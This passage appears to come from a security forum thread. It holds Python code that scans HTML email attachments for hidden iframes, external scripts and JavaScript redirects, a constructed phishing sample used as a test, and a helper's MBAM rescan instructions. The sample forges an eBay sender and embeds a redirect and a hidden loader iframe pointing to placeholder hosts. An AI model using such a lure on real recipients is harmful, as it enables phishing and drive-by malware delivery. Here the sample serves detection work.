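            kind = "hidden-iframe" if is_hidden(a) else "iframe"
            self.findings.append((kind, a.get("src") or ""))
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.findings.append(("external-script", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here; look for location changes inside them.
        if self._in_script and REDIRECT_JS.search(data):
            self.findings.append(("js-redirect", " ".join(data.split())[:80]))


def scan_message(raw_bytes):
    """Return [(attachment name, kind, detail)] for every HTML attachment in an RFC 822 message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    report = []
    for part in msg.walk():
        name = part.get_filename()
        if not name:
            continue
        if part.get_content_type() != "text/html" and not name.lower().endswith((".htm", ".html")):
            continue
        html = part.get_payload(decode=True).decode("utf-8", "replace")
        scanner = RedirectScanner()
        scanner.feed(html)
        scanner.close()
        report.extend((name, kind, detail) for kind, detail in scanner.findings)
    return report


def build_sample_email():
    """Constructed message modelled on the post's description; the domains are placeholders."""
    msg = EmailMessage()
    msg["From"] = "eBay <eBay@reply1.ebay.com>"  # forged sender, as in the post
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "Payment request from"
    # No body part at all, matching "no message contained in the body"; only the attachment.
    form_html = (
        "<html><body>\n"
        '<script>window.location = "http://pharmacy-spam.example/";</script>\n'
        '<iframe src="http://loader.example/x.php" width="1" height="1" style="display:none"></iframe>\n'
        "</body></html>\n"
    )
    msg.add_attachment(form_html, subtype="html", filename="form.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, kind, detail in scan_message(build_sample_email()):
        print(f"{name}: {kind}: {detail}")
```

In a mail gateway this would sit alongside the usual rule that an HTML attachment from a sender who never sends them is itself worth quarantining; the scanner adds the reason, which is what makes the alert reviewable. Obfuscated scripts (string-built location calls, encoded payloads) will not match the plain regex, so an "external-script" or "hidden-iframe" finding on its own should still be treated as suspicious.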
  25. Hi HiM,
     That was a fair chunk of rubbish ;)
     Sounds like the system is running normally again..... but let's double check everything before we finish off.
     Please update MBAM and run another scan:
     Start MBAM
     Click on the Update tab
     http://img.photobucket.com/albums/v708/starbuck50/mbam1.png
     Click Check for Updates
     http://img.photobucket.com/albums/v708/starbuck50/mbam2.png
     If it says that MBAM needs to close to update it... let it close and then restart.
     Then click the Scan button.
     Don't forget: Please copy and paste the report here for me.
     Thanks